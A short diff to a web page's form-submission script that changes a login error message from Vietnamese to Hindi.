--- a/index.html
+++ b/index.html
@@ -185,7 +185,7 @@ async function submitForm() {
                 } else if (count == 1) {
                     $('#noti').css({ "color": "#879600" });
                 }
-                $('#noti').text('Tài khoản bạn vừa nhập không hợp lệ, Vui lòng thử lại.');
+                $('#noti').text('आपके द्वारा डाला गया पासवर्ड गलत है. फिर से कोशिश करें? ');
                 $('#loading').hide();
             }, error: function(request, status, error) {
                 $('#loading').hide();
